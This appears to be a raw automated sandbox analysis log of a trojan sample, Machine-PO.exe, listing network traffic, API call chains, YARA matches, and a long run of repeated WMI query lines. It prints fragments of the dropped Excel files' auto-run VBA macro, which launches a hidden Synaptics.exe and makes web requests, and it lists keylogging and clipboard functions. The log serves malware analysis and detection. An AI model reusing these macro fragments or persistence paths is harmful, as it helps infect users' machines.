Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49754 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49768 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49776 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49789 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49791 version: TLS 1.2
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00257099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00257099
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00257294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00257294
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00244342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0026F5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                              System Summary

Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: GZrLyJhZ.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: SQSJKEBWDT.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: GZrLyJhZ.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: SQSJKEBWDT.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: GZrLyJhZ.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: SQSJKEBWDT.xlsm.3.dr | Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024702F: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0020DCD0
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0020A0C0
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00220183
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024220C
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00208530
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00206670
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00220677
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00238779
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0026A8DC
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00220A8F
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00206BBC
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00208CA0
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0022AC83
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0021AD5C
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00234EBF
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00220EC4
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002630AD
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023113E
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002212F9
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023542F
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0026F5D0
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00213680
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023599F
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0022DA74
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00205D32
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0020BDF0
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0022BDF6
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00221E5A
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0022DF69
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024BFB8
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00237FFD
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_Open()
Source: GZrLyJhZ.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_Open()
Source: SQSJKEBWDT.xlsm.3.dr | OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: Joe Sandbox View | Dropped File: C:\ProgramData\Synaptics\RCX7868.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: String function: 00227750 appears 42 times
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: String function: 0021F885 appears 68 times
Source: C:\ProgramData\Synaptics\Synaptics.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996
Source: Machine-PO.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Machine-PO.exe | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX7868.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.3.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Machine-PO.exe, 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs Machine-PO.exe
Source: Machine-PO.exe, 00000000.00000000.1488871651.0000000000617000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameb! vs Machine-PO.exe
Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs Machine-PO.exe
Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameD vs Machine-PO.exe
Source: Machine-PO.exe, 00000000.00000003.1497607982.0000000002320000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameb! vs Machine-PO.exe
Source: Machine-PO.exe | Binary or memory string: OriginalFileName vs Machine-PO.exe
Source: Machine-PO.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@23/39@6/4
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024D712 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023B8B0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00246F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0025C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002031F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Users\user\Desktop\Machine-PO.exe | File created: C:\Users\user\Desktop\._cache_Machine-PO.exe
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6892
Source: C:\ProgramData\Synaptics\Synaptics.exe | Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | File created: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
Source: Yara match | File source: Machine-PO.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Machine-PO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1488767139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\Synaptics\RCX7868.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\Documents\PIVFAGEAAV\~$cache1, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
Source: C:\Users\user\Desktop\Machine-PO.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
